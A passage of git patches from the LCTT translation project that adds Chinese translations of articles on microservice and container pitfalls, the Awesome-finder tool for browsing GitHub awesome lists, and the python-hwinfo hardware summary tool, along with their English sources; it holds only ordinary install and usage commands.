+如果你刚开始从 100% 的单体应用转型,或者你的组织在容器或微服务方面还没有深厚的知识储备,那么请记住:微服务和容器其实并不是绑在一起的。这意味着你可以先在其中一项上积累内部专业知识,然后再引入另一项。[Sungard Availability Services][5] 的资深 CTO 架构师 Kevin McGrath 建议:先通过容器化现有应用或新应用,建立起团队在容器方面的知识和技能,然后在后续阶段,再在有益的地方迁移到微服务架构。
+
+McGrath 说:“那些把微服务运转得非常好的公司,都是经过多年迭代才获得了快速行动的能力。如果组织不能快速行动,微服务就会很难支撑下去。先学会快速行动,容器化可以在这方面帮到你,然后再去操心干掉单体应用的事。”
+
+### 2. 从一个面向客户的或者关键的业务应用开始
+
+对于刚开始接触容器、微服务或者两者的组织来说,还有一个相关的陷阱:还没有在食物链更下游的小动物身上练过手,就想去驯服单体丛林里的那头雄狮。
+
+在你的学习过程中预期会有一些错误出现 - 你是希望这些错误发生在面向客户的关键业务应用上,还是,仅对 IT 或者其他内部团队可见的低风险应用上?
+
+DigitalOcean 的 Browning 说,“如果整个生态系统都是新的,为了获取一些微服务和容器方面的操作经验,那么,将它们先应用到影响面较低的区域,比如像你的持续集成系统或者内部工具,可能是一个低风险的做法。”你获得这方面的经验以后,当然会将这些技术应用到为客户提供服务的生产系统上。而现实情况是,不论你准备的如何周全,都不可避免会遇到问题,因此,需要提前为可能出现的问题制定应对之策。
+
+### 3. 在没有合适的团队之前引入了太多的复杂性
+
+随着微服务架构规模的扩大,它可能会带来复杂的管理需求。
+
+正如 [Red Hat][6] 技术布道师 [Gordon Haff][7] 最近写道的:“一个符合 OCI 标准的容器运行时本身很擅长管理单个容器。但是,当你开始使用越来越多的容器和容器化应用,并把它们拆分成成百上千个组件之后,管理和编排就会变得非常棘手。最终,你需要退后一步,把容器分组来交付服务,比如跨容器的网络、安全和遥测。”
+
+Haff 还指出:“此外,由于容器是可移植的,所以与之相关的管理栈也必须同样可移植,这一点很重要。这正是 [Kubernetes][8] 这类编排技术的用武之地,它们简化了 IT 部门的这种需求。”(Haff 的全文请参阅:[容器化为编写应用带来的 5 个优势][1]。)
+
+另外,你还需要一个合适的团队。如果你已经是一个 [DevOps shop][9],那么你可能特别适合做这种转型。无论如何,从一开始就要让各个领域的人都参与进来。
+
+[Cloud Technology Partners][10] 的副总裁兼首席云架构师 Mike Kavis 说:“随着时间的推移,部署的服务越来越多,管理起来会变得非常吃力。要本着 DevOps 的真正精神,确保所有领域的专家,包括开发、测试、安全、运维等,从一开始就参与进来,共同协作,找出构建、部署、运行和保护基于容器的微服务的最佳方式。”
+
+### 4. 忽视重要的需求:自动化
+
+除了具有一个合适的团队之外,那些在基于容器化的微服务部署比较成功的组织都倾向于以“实现尽可能多的自动化”来解决固有的复杂性。
+
+[CloudBees][11] 的资深软件工程师 Carlos Sanchez 在谈到一些常见挑战时说:“分布式架构并不容易,像数据持久化、日志、调试排错这些事情,在微服务架构中都会变得非常复杂。”按照定义,Sanchez 所说的这类分布式架构,随着规模的增长,会变成一项极其繁重的运维工作。“服务和组件的激增,使得自动化成为一项硬性要求。”Sanchez 提醒道,“手动管理是无法扩展的。”
+
+### 5. 随着时间的推移,微服务变得越来越臃肿
+
+在容器中运行一个服务或者软件组件并没有什么神奇之处,这样做并不能保证你得到的就是微服务。[ShieldX Networks][12] 的 CTO Manual Nedbal 提醒说,IT 专业人员需要确保,随着时间的推移,他们的微服务依然还是微服务。
+
+Nedbal 说:“有些软件组件会随着时间积累大量的代码和特性。把它们塞进一个容器里并不一定就能得到微服务,也不一定能带来同样的好处。而且,随着组件越长越大,工程师需要留意时机,把这些逐渐演变出来的单体再次拆分。”
+
+--------------------------------------------------------------------------------
+
+via: https://enterprisersproject.com/article/2017/9/using-microservices-containers-wisely-5-pitfalls-avoid
+
+作者:[Kevin Casey][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://enterprisersproject.com/user/kevin-casey
+[1]:https://enterprisersproject.com/article/2017/8/5-advantages-containers-writing-applications
+[2]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
+[3]:https://www.digitalocean.com/
+[4]:https://enterprisersproject.com/article/2017/8/how-explain-microservices-plain-english?sc_cid=70160000000h0aXAAQ
+[5]:https://www.sungardas.com/
+[6]:https://www.redhat.com/en
+[7]:https://enterprisersproject.com/user/gordon-haff
+[8]:https://www.redhat.com/en/containers/what-is-kubernetes
+[9]:https://enterprisersproject.com/article/2017/8/devops-jobs-how-spot-great-devops-shop
+[10]:https://www.cloudtp.com/
+[11]:https://www.cloudbees.com/
+[12]:https://www.shieldx.com/
From 7a448de6c0fcd5de451f64ae0ca1c0f86832ba32 Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 19:03:09 +0800
Subject: [PATCH 217/371] translate done: 20170927 How To Easily Find Awesome
Projects And Resources Hosted In GitHub.md
---
...Projects And Resources Hosted In GitHub.md | 159 ------------------
...Projects And Resources Hosted In GitHub.md | 155 +++++++++++++++++
2 files changed, 155 insertions(+), 159 deletions(-)
delete mode 100644 sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
create mode 100644 translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
diff --git a/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md b/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
deleted file mode 100644
index efdfc35ee3..0000000000
--- a/sources/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
+++ /dev/null
@@ -1,159 +0,0 @@
-translating by lujun9972
-How To Easily Find Awesome Projects And Resources Hosted In GitHub
-======
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/Awesome-finder-Find-Awesome-Projects-720x340.png)
-
-Every day there are hundreds of new additions to the **GitHub** website. Since GitHub hosts thousands of projects, searching for a good one can be exhausting. Fortunately, a group of contributors have made curated lists of awesome stuff hosted on GitHub. These lists contain a lot of awesome items grouped under different categories such as programming, databases, editors, gaming, entertainment and many more. They make it much easier to find any project, software, resource, library, book or anything else hosted on GitHub. A fellow GitHub user went one step further and created a command-line utility called **"Awesome-finder"** to find awesome projects and resources in the awesome series of repositories. This utility helps us browse through the curated awesome lists without leaving the Terminal, and without using a browser of course.
-
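-Under the hood, tools like this do something conceptually very simple: fetch the README of an awesome list and filter its entries. The short Python sketch below is only an illustration of that idea; it is not Awesome-finder's actual code, and the raw-README URL for the sindresorhus/awesome repository is an assumption you may need to adjust.
-
-```
-# Illustration only -- NOT Awesome-finder's implementation.
-# Fetch the raw README of an awesome list and print entries matching a term.
-import sys
-import urllib.request
-
-RAW_URL = "https://raw.githubusercontent.com/sindresorhus/awesome/main/readme.md"  # assumed path
-
-def search_awesome(term):
-    with urllib.request.urlopen(RAW_URL) as resp:
-        text = resp.read().decode("utf-8")
-    for line in text.splitlines():
-        # Entries in these lists are markdown bullets like "- [Name](url) - description"
-        if line.lstrip().startswith("-") and term.lower() in line.lower():
-            print(line.strip())
-
-if __name__ == "__main__":
-    search_awesome(sys.argv[1] if len(sys.argv) > 1 else "python")
-```
-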
-In this brief guide, I will show you how to easily browse through the curated list of awesome lists in Unix-like systems.
-
-### Awesome-finder - Easily Find Awesome Projects And Resources Hosted In GitHub
-
-#### Installing Awesome-finder
-
-Awesome-finder can be easily installed using **pip**, a package manager for installing programs written in the Python programming language.
-
-On **Arch Linux** and its derivatives like **Antergos** and **Manjaro Linux**, you can install pip using the following command:
-```
-sudo pacman -S python-pip
-```
-
-On **RHEL** , **CentOS** :
-```
-sudo yum install epel-release
-```
-```
-sudo yum install python-pip
-```
-
-On **Fedora** :
-```
-sudo dnf install epel-release
-```
-```
-sudo dnf install python-pip
-```
-
-On **Debian** , **Ubuntu** , **Linux Mint** :
-```
-sudo apt-get install python-pip
-```
-
-On **SUSE** , **openSUSE** :
-```
-sudo zypper install python-pip
-```
-
-Once pip is installed, run the following command to install the 'Awesome-finder' utility.
-```
-sudo pip install awesome-finder
-```
-
-#### Usage
-
-Awesome-finder currently lists the items from the following awesome topics (repositories, of course) on the GitHub site:
-
- * awesome
- * awesome-android
- * awesome-elixir
- * awesome-go
- * awesome-ios
- * awesome-java
- * awesome-javascript
- * awesome-php
- * awesome-python
- * awesome-ruby
- * awesome-rust
- * awesome-scala
- * awesome-swift
-
-
-
-This list will be updated on a regular basis.
-
-For instance, to view the curated list from awesome-go repository, just type:
-```
-awesome go
-```
-
-You will see all the popular stuff written in "Go", sorted in alphabetical order.
-
-[![][1]][2]
-
-You can navigate through the list using the **UP/DOWN** arrow keys. Once you have found what you are looking for, select it and hit the **ENTER** key to open the link in your default web browser.
-
-Similarly,
-
- * "awesome android" command will search the **awesome-android** repository.
- * "awesome awesome" command will search the **awesome** repository.
- * "awesome elixir" command will search the **awesome-elixir**.
- * "awesome go" will search the **awesome-go**.
- * "awesome ios" will search the **awesome-ios**.
- * "awesome java" will search the **awesome-java**.
- * "awesome javascript" will search the **awesome-javascript**.
- * "awesome php" will search the **awesome-php**.
- * "awesome python" will search the **awesome-python**.
- * "awesome ruby" will search the **awesome-ruby**.
- * "awesome rust" will search the **awesome-rust**.
- * "awesome scala" will search the **awesome-scala**.
- * "awesome swift" will search the **awesome-swift**.
-
-
-
-Also, it automatically displays suggestions as you type at the prompt. For instance, when I type "dj", it displays the items related to Django.
-
-[![][1]][3]
-
-If you want to find the awesome things from the latest awesome- lists (instead of using the cache), use the -f or --force flag:
-```
-awesome -f (--force)
-
-```
-
-**Example:**
-```
-awesome python -f
-```
-
-Or,
-```
-awesome python --force
-```
-
-The above command will display the curated list from the **awesome-python** GitHub repository.
-
-Awesome, isn't it?
-
-To exit from this utility, press **ESC** key. To display help, type:
-```
-awesome -h
-```
-
-And, that's all for now. Hope this helps. If you find our guides useful, please share them on your social and professional networks, so everyone can benefit from them. More good stuff to come. Stay tuned!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/
-
-作者:[SK][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[2]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_008-1.png ()
-[3]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_009.png ()
-[4]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=reddit (Click to share on Reddit)
-[5]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=twitter (Click to share on Twitter)
-[6]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=facebook (Click to share on Facebook)
-[7]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=google-plus-1 (Click to share on Google+)
-[8]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=linkedin (Click to share on LinkedIn)
-[9]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=pocket (Click to share on Pocket)
-[10]:whatsapp://send?text=How%20To%20Easily%20Find%20Awesome%20Projects%20And%20Resources%20Hosted%20In%20GitHub%20https%3A%2F%2Fwww.ostechnix.com%2Feasily-find-awesome-projects-resources-hosted-github%2F (Click to share on WhatsApp)
-[11]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=telegram (Click to share on Telegram)
-[12]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=email (Click to email this to a friend)
-[13]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/#print (Click to print)
diff --git a/translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md b/translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
new file mode 100644
index 0000000000..80566a8ae0
--- /dev/null
+++ b/translated/tech/20170927 How To Easily Find Awesome Projects And Resources Hosted In GitHub.md
@@ -0,0 +1,155 @@
+如何方便地寻找 GitHub 上超棒的项目和资源
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/Awesome-finder-Find-Awesome-Projects-720x340.png)
+
+在 **GitHub** 网站上每天都会新增上百个项目。由于 GitHub 上有成千上万的项目,要在上面搜索好的项目简直要累死人。好在,有那么一伙人已经创建了一些这样的精选列表,其中包含的类别五花八门,如编程、数据库、编辑器、游戏、娱乐等。这使得我们寻找在 GitHub 上托管的项目、软件、资源、库、书籍等其他东西变得容易了很多。有一个 GitHub 用户更进了一步,创建了一个名叫 `Awesome-finder` 的命令行工具,用来在 awesome 系列的仓库中寻找超棒的项目和资源。该工具可以让我们在不离开终端(当然也就不用浏览器)的情况下浏览这些 awesome 列表。
+
+在这篇简单的说明中,我会向你演示如何方便地在类 Unix 系统中浏览 awesome 列表。
+
+### Awesome-finder - 方便地寻找 GitHub 上超棒的项目和资源
+
+#### 安装 Awesome-finder
+
+使用 `pip` 可以很方便地安装该工具,`pip` 是一个用来安装使用 Python 编程语言开发的程序的包管理器。
+
+在 **Arch Linux** 及其衍生发行版中(比如 **Antergos**、**Manjaro Linux**),你可以使用下面的命令安装 `pip`:
+```
+sudo pacman -S python-pip
+```
+
+在 **RHEL**,**CentOS** 中:
+```
+sudo yum install epel-release
+```
+```
+sudo yum install python-pip
+```
+
+在 **Fedora** 上:
+```
+sudo dnf install epel-release
+```
+```
+sudo dnf install python-pip
+```
+
+在 **Debian**,**Ubuntu**,**Linux Mint** 上:
+```
+sudo apt-get install python-pip
+```
+
+在 **SUSE**,**openSUSE** 上:
+```
+sudo zypper install python-pip
+```
+
+PIP 安装好后,用下面命令来安装 'Awesome-finder'。
+```
+sudo pip install awesome-finder
+```
+
+#### 用法
+
+Awesome-finder 会列出 GitHub 网站中如下这些主题(其实就是仓库)的内容:
+
+ * awesome
+ * awesome-android
+ * awesome-elixir
+ * awesome-go
+ * awesome-ios
+ * awesome-java
+ * awesome-javascript
+ * awesome-php
+ * awesome-python
+ * awesome-ruby
+ * awesome-rust
+ * awesome-scala
+ * awesome-swift
+
+
+该列表会定期更新。
+
+比如,要查看 `awesome-go` 仓库中的列表,只需要输入:
+```
+awesome go
+```
+
+你就能看到用 “Go” 写的所有流行的东西了,而且这些东西按字母顺序进行了排列。
+
+[![][1]][2]
+
+你可以通过 **上/下** 箭头在列表中导航。一旦找到所需要的东西,只需要选中它,然后按下 **回车** 键就会用你默认的 web 浏览器打开相应的链接了。
+
+类似的,
+
+ * "awesome android" 命令会搜索 **awesome-android** 仓库。
+ * "awesome awesome" 命令会搜索 **awesome** 仓库。
+ * "awesome elixir" 命令会搜索 **awesome-elixir**。
+ * "awesome go" 命令会搜索 **awesome-go**。
+ * "awesome ios" 命令会搜索 **awesome-ios**。
+ * "awesome java" 命令会搜索 **awesome-java**。
+ * "awesome javascript" 命令会搜索 **awesome-javascript**。
+ * "awesome php" 命令会搜索 **awesome-php**。
+ * "awesome python" 命令会搜索 **awesome-python**。
+ * "awesome ruby" 命令会搜索 **awesome-ruby**。
+ * "awesome rust" 命令会搜索 **awesome-rust**。
+ * "awesome scala" 命令会搜索 **awesome-scala**。
+ * "awesome swift" 命令会搜索 **awesome-swift**。
+
+而且,它还会随着你在提示符中输入的内容而自动进行筛选。比如,当我输入 "dj" 后,它会显示与 Django 相关的内容。
+
+[![][1]][3]
+
+若你想从最新的 `awesome-` 列表中搜索(而不是使用缓存中的数据),请使用 `-f` 或 `--force` 标志:
+```
+awesome -f (--force)
+
+```
+
+**像这样:**
+```
+awesome python -f
+```
+
+或,
+```
+awesome python --force
+```
+
+上面命令会显示 **awesome-python** GitHub 仓库中的列表。
+
+很棒,对吧?
+
+要退出这个工具的话,按下 **ESC** 键。要显示帮助信息,输入:
+```
+awesome -h
+```
+
+本文至此就结束了。希望本文能对你产生帮助。如果你觉得我们的文章对你有帮助,请将他们分享到你的社交网络中去,造福大众。我们马上还有其他好东西要来了。敬请期待!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[2]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_008-1.png ()
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_009.png ()
+[4]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=reddit (Click to share on Reddit)
+[5]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=twitter (Click to share on Twitter)
+[6]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=facebook (Click to share on Facebook)
+[7]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=google-plus-1 (Click to share on Google+)
+[8]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=linkedin (Click to share on LinkedIn)
+[9]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=pocket (Click to share on Pocket)
+[10]:whatsapp://send?text=How%20To%20Easily%20Find%20Awesome%20Projects%20And%20Resources%20Hosted%20In%20GitHub%20https%3A%2F%2Fwww.ostechnix.com%2Feasily-find-awesome-projects-resources-hosted-github%2F (Click to share on WhatsApp)
+[11]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=telegram (Click to share on Telegram)
+[12]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=email (Click to email this to a friend)
+[13]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/#print (Click to print)
From 2e1636b4babccc4a4b410e102eb142dd4e752cc2 Mon Sep 17 00:00:00 2001
From: Torival
Date: Wed, 10 Jan 2018 20:00:11 +0800
Subject: [PATCH 218/371] Create 20171005 python-hwinfo - Display Summary Of
Hardware Information In Linux.md
---
...ummary Of Hardware Information In Linux.md | 179 ++++++++++++++++++
1 file changed, 179 insertions(+)
create mode 100644 translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
diff --git a/translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
new file mode 100644
index 0000000000..e56ce8e292
--- /dev/null
+++ b/translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
@@ -0,0 +1,179 @@
+# python-hwinfo:使用Linux系统工具展示硬件信息概况
+
+---
+到目前为止,能够获取 Linux 系统硬件信息和配置的工具,我们已经介绍了大部分,不过,能实现同样目的的命令还有很多。
+
+其中,有些工具可以显示所有硬件组件的详细信息,而其余的工具则只显示特定设备的信息。
+
+在这个系列中,今天我们来讨论一下 [python-hwinfo][1],它是能以简洁的方式展示硬件信息概况及其配置的工具之一。
+
+### 什么是python-hwinfo
+
+这是一个通过解析系统工具(例如lspci和dmidecode)的输出,来检查硬件和设备的Python库。
+
+它提供了一个简单的命令行工具,可以用来检查本地,远程和捕获到的主机。用sudo运行命令以获得最大的信息。
+
+另外,你可以通过提供服务器 IP 或者主机名、用户名和密码,在远程服务器上执行它。你也可以使用这个工具查看其它工具捕获到的输出(例如 dmidecode 输出保存的 'dmidecode.out',/proc/cpuinfo 保存的 'cpuinfo',lspci -nnm 输出保存的 'lspci-nnm.out')。
+
+**建议阅读 :**
+**(#)** [inxi - A Great Tool to Check Hardware Information on Linux][2]
+**(#)** [Dmidecode - Easy Way To Get Linux System Hardware Information][3]
+**(#)** [LSHW (Hardware Lister) - A Nifty Tool To Get A Hardware Information On Linux][4]
+**(#)** [hwinfo (Hardware Info) - A Nifty Tool To Detect System Hardware Information On Linux][5]
+**(#)** [How To Use lspci, lsscsi, lsusb, And lsblk To Get Linux System Devices Information][6]
+
+### Linux上如何安装python-hwinfo
+
+在绝大多数Linux发行版,都可以通过pip包安装。为了安装python-hwinfo, 确保你的系统已经有python和python-pip包作为先决条件。
+
+pip是Python附带的一个包管理工具,在Linux上安装Python包的推荐工具之一。
+
+在**`Debian/Ubuntu`**平台,使用[APT-GET 命令][7] 或者 [APT 命令][8] 安装pip。
+```
+$ sudo apt install python-pip
+
+```
+
+在**`RHEL/CentOS`**平台,使用[YUM 命令][9]安装pip。
+```
+$ sudo yum install python-pip python-devel
+
+```
+
+在**`Fedora`**平台,使用[DNF 命令][10]安装pip。
+```
+$ sudo dnf install python-pip
+
+```
+
+在**`Arch Linux`**平台,使用[Pacman 命令][11]安装pip。
+```
+$ sudo pacman -S python-pip
+
+```
+
+在**`openSUSE`**平台,使用[Zypper 命令][12]安装pip。
+```
+$ sudo zypper install python-pip
+
+```
+
+最后,执行下面的pip命令安装python-hwinfo。
+```
+$ sudo pip install python-hwinfo
+
+```
+
+### 如何在本地机器上使用 python-hwinfo
+
+执行下面的命令,检查本地机器现有的硬件。输出很清楚和整洁,这是我在其他命令中没有看到的。
+
+它的输出分为了五类。
+
+ * **`Bios Info:`** bios供应商名称,系统产品名称, 系统序列号,系统唯一标识符,系统制造商,bios发布日期和bios版本。
+ * **`CPU Info:`** 处理器编号,供应商ID,cpu系列代号,型号,制作更新版本,型号名称,cpu主频。
+ * **`Ethernet Controller Info:`** 供应商名称,供应商ID,设备名称,设备ID,子供应商名称,子供应商ID,子设备名称,子设备ID。
+ * **`Storage Controller Info:`** 供应商名称,供应商ID,设备名称,设备ID,子供应商名称,子供应商ID,子设备名称,子设备ID。
+ * **`GPU Info:`** 供应商名称,供应商ID,设备名称,设备ID,子供应商名称,子供应商ID,子设备名称,子设备ID。
+
+
+```
+$ sudo hwinfo
+
+Bios Info:
+
++----------------------+--------------------------------------+
+| Key | Value |
++----------------------+--------------------------------------+
+| bios_vendor_name | IBM |
+| system_product_name | System x3550 M3: -[6102AF1]- |
+| system_serial_number | RS2IY21 |
+| chassis_type | Rack Mount Chassis |
+| system_uuid | 4C4C4544-0051-3210-8052-B2C04F323132 |
+| system_manufacturer | IBM |
+| socket_count | 2 |
+| bios_release_date | 10/21/2014 |
+| bios_version | -[VLS211TSU-2.51]- |
+| socket_designation | Socket 1, Socket 2 |
++----------------------+--------------------------------------+
+
+CPU Info:
+
++-----------+--------------+------------+-------+----------+------------------------------------------+----------+
+| processor | vendor_id | cpu_family | model | stepping | model_name | cpu_mhz |
++-----------+--------------+------------+-------+----------+------------------------------------------+----------+
+| 0 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 1 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 2 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 3 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 4 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-2650 0 @ 2.00GHz | 1200.000 |
++-----------+--------------+------------+-------+----------+------------------------------------------+----------+
+
+Ethernet Controller Info:
+
++-------------------+-----------+---------------------------------+-----------+-------------------+--------------+---------------------------------+--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------+-----------+---------------------------------+-----------+-------------------+--------------+---------------------------------+--------------+
+| Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 | Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 |
++-------------------+-----------+---------------------------------+-----------+-------------------+--------------+---------------------------------+--------------+
+
+Storage Controller Info:
+
++-------------------+-----------+----------------------------------------------+-----------+----------------+--------------+----------------+--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------+-----------+----------------------------------------------+-----------+----------------+--------------+----------------+--------------+
+| Intel Corporation | 8086 | C600/X79 series chipset IDE-r Controller | 1d3c | Dell | 1028 | [Device 05d2] | 05d2 |
+| Intel Corporation | 8086 | C600/X79 series chipset SATA RAID Controller | 2826 | Dell | 1028 | [Device 05d2] | 05d2 |
++-------------------+-----------+----------------------------------------------+-----------+----------------+--------------+----------------+--------------+
+
+GPU Info:
+
++--------------------+-----------+-----------------------+-----------+--------------------+--------------+----------------+--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++--------------------+-----------+-----------------------+-----------+--------------------+--------------+----------------+--------------+
+| NVIDIA Corporation | 10de | GK107GL [Quadro K600] | 0ffa | NVIDIA Corporation | 10de | [Device 094b] | 094b |
++--------------------+-----------+-----------------------+-----------+--------------------+--------------+----------------+--------------+
+
+```
+
+### 如何在远程机器上使用 python-hwinfo
+
+执行下面的命令检查远程机器上现有的硬件,这需要提供远程机器的 IP、用户名和密码:
+```
+$ hwinfo -m x.x.x.x -u root -p password
+
+```
+
+### 如何使用 python-hwinfo 读取捕获的输出
+
+执行下面的命令,即可查看之前捕获到的输出文件中的硬件信息:
+```
+$ hwinfo -f [Path to file]
+
+```
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/python-hwinfo-check-display-system-hardware-configuration-information-linux/
+
+作者:[2DAYGEEK][a]
+译者:[Torival](https://github.com/Torival)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://github.com/rdobson/python-hwinfo
+[2]:https://www.2daygeek.com/inxi-system-hardware-information-on-linux/
+[3]:https://www.2daygeek.com/dmidecode-get-print-display-check-linux-system-hardware-information/
+[4]:https://www.2daygeek.com/lshw-find-check-system-hardware-information-details-linux/
+[5]:https://www.2daygeek.com/hwinfo-check-display-detect-system-hardware-information-linux/
+[6]:https://www.2daygeek.com/check-system-hardware-devices-bus-information-lspci-lsscsi-lsusb-lsblk-linux/
+[7]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
+[8]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
+[9]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
+[10]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
+[11]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
+[12]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
+
+
From 329c0f404537525ea9445e514fb42d6783bdedc0 Mon Sep 17 00:00:00 2001
From: Torival
Date: Wed, 10 Jan 2018 20:02:28 +0800
Subject: [PATCH 219/371] Delete 20171005 python-hwinfo - Display Summary Of
Hardware Information In Linux.md
---
...ummary Of Hardware Information In Linux.md | 176 ------------------
1 file changed, 176 deletions(-)
delete mode 100644 sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
diff --git a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
deleted file mode 100644
index e066269efb..0000000000
--- a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
+++ /dev/null
@@ -1,176 +0,0 @@
-Translating by Torival python-hwinfo : Display Summary Of Hardware Information In Linux
-======
-To date, we have covered most of the utilities that discover Linux system hardware information and configuration, but there are still plenty of commands available for the same purpose.
-
-Among them, some utilities display detailed information about all the hardware components, while the rest show only specific device information.
-
-In this series, today we are going to discuss [python-hwinfo][1], one of the tools that displays a summary of hardware information and its configuration in a neat way.
-
-### What's python-hwinfo
-
-This is a Python library for inspecting hardware and devices by parsing the outputs of system utilities such as lspci and dmidecode.
-
-It offers a simple CLI tool which can be used to inspect local, remote and captured hosts. Run the command with sudo to get the maximum information.
-
-Additionally, you can execute it on a remote server by providing the server IP or host name, username, and password. You can also use this tool to view the captured outputs of other utilities, such as the output of dmidecode saved as 'dmidecode.out', /proc/cpuinfo saved as 'cpuinfo', or lspci -nnm saved as 'lspci-nnm.out'.
-
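-To get a feel for the kind of parsing involved, here is a small, self-contained Python sketch. It is not python-hwinfo's own code or API; it simply runs `lspci -nnm` with the standard library and splits each line into its quoted fields, which is roughly the raw material such a library turns into neat tables:
-
-```
-# Illustrative sketch only -- not python-hwinfo's internals or API.
-# Run "lspci -nnm" and print the class, vendor and device of each PCI device.
-import shlex
-import subprocess
-
-def list_pci_devices():
-    out = subprocess.run(["lspci", "-nnm"], capture_output=True, text=True, check=True).stdout
-    devices = []
-    for line in out.splitlines():
-        fields = shlex.split(line)  # fields are quoted, so shlex handles them cleanly
-        if len(fields) >= 4:
-            devices.append({"slot": fields[0], "class": fields[1],
-                            "vendor": fields[2], "device": fields[3]})
-    return devices
-
-if __name__ == "__main__":
-    for dev in list_pci_devices():
-        print("{slot:10} {vendor} -> {device}".format(**dev))
-```
-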
-**Suggested Read :**
-**(#)** [inxi - A Great Tool to Check Hardware Information on Linux][2]
